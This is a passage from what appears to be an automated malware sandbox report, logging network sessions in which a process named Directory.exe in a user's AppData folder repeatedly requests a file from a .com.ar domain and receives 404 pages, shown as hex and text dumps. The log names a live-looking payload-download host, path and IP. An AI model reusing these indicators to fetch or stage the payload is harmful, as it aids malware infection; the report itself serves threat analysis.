                                                        2024-11-21 11:55:53 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.649847167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:54 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:55 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:55 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:55 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.649854167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:56 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:57 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:57 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:57 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.649861167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:58 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:59 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:59 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:59 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.649868167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:01 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:01 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:01 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:01 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.649873167.250.5.91443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:03 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:03 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:03 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.649879167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:05 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:05 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:05 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:05 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.649886167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:07 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:08 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:08 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:08 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.649893167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:10 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:10 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:10 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:10 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.649901167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:12 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:12 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:12 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:12 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.649906167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:14 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:15 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:14 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:15 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.649912167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:16 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:17 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:16 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:17 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.649919167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:18 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:19 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:18 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:19 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.649925167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:20 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:21 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:21 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:21 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.649932167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:23 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:23 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:23 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
